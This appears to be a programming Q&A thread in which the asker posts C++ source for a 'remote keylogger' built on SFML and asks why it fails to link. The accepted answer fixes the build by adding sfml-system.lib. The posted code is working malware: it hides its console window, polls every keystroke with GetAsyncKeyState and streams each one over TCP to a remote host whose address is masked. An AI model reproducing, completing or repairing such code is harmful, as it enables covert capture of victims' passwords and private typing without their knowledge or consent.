# Unresolved external symbol sf::Time with SFML

Tags: c++, sfml

So I'm working on a remote keylogger for **educational** purposes. For some reason when I attempt to compile the client, I get this error (I'm using SFML):

```
Error   LNK2001 unresolved external symbol "__declspec(dllimport) public: 
static class sf::Time const sf::Time::Zero" (__imp_?Zero@Time@sf@@2V12@B)
```

What's weird is that the server compiles fine and it uses the same library. I've checking my linker settings countless times and have even tried creating a new project, but am having no success.

Here's the code:

```
#include <fstream>
#include <Windows.h>
#include <SFML\Network.hpp>
#include <iostream>

void ConnectToHost(sf::TcpSocket* socket)
{
    sf::Socket::Status status = socket->connect("*****", ***);

    if (status != sf::Socket::Done)
        std::cout << "Error connecting to socket." << std::endl;

    return;
}

int main()
{
    FreeConsole();

    sf::TcpSocket socket;
    ConnectToHost(&socket);

    while (1)
    {
        for (char key = 8; key <= 190; key++)
        {
            if (GetAsyncKeyState(key) == -32767)
            {
                char key_sent[50] = { key };
                socket.send(key_sent, sizeof(key_sent));
            }
        }
    }
    return 0;
}
```

I'm currently linking the sfml-network-d.lib to debug and the sfml-network.lib to release, however I have also tried linking all the sfml dynamic link libraries as well, so that couldn't have anything to do with it. Anyway, I'm assuming this is just a careless mistake I've overthought or overlooked, but since I've been looking into this for a couple of days now, thought I'd post it as a question.

Answer (score 4, accepted):

Your error says that there's nothing wrong with your code, it's a problem with the linking.  You are linking to [sfml-network.lib](https://www.sfml-dev.org/documentation/2.4.2/group__network.php), but you'll need to link to [sfml-system.lib](https://www.sfml-dev.org/documentation/2.4.2/group__system.php) in order to get sf::Time.

sfml-network.lib only gives you: Ftp, Http, IpAddress, Packet, Socket, SocketSelector, TcpListener, TcpSocket, UdpSocket.

SFML-network has a dependancy on SFML-System as described [here](https://www.sfml-dev.org/faq.php#build-link).  You'll need to explicitly link to SFML-system whenever using SFML-network.

Another quick note is that you mentioned linking to the dynamic link libraries.  You shouldn't link to any DLLs, the .libs that you linked actually let you import those DLLs. If you want to do the opposite (statically link), then you'll need to link to the *-s.lib variants.